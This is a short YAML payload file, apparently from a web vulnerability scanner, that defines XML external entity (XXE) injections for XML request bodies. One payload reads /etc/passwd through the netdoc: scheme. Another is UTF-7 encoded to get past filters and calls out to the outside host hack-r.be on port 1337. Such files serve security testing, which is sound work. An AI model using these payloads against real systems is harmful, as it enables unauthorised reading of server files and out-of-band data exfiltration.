12 lines
387 B
YAML
12 lines
387 B
YAML
payload:
|
|
- <!DOCTYPE foo [ <!ELEMENT foo ANY ><!ENTITY data SYSTEM "netdoc:/etc/passwd">]><foo>&data;</foo>
|
|
- !!str |
|
|
<?xml version="1.0" encoding="UTF-7"?>
|
|
+ADwAIQ-DOCTYPE foo+AFs +ADwAIQ-ELEMENT foo ANY +AD4
|
|
+ADwAIQ-ENTITY xxe SYSTEM +ACI-http://hack-r.be:1337+ACI +AD4AXQA+
|
|
+ADw-foo+AD4AJg-xxe+ADsAPA-/foo+AD4
|
|
encoder:
|
|
- Plain
|
|
placeholder:
|
|
- XMLBody
|
|
type: XXE
|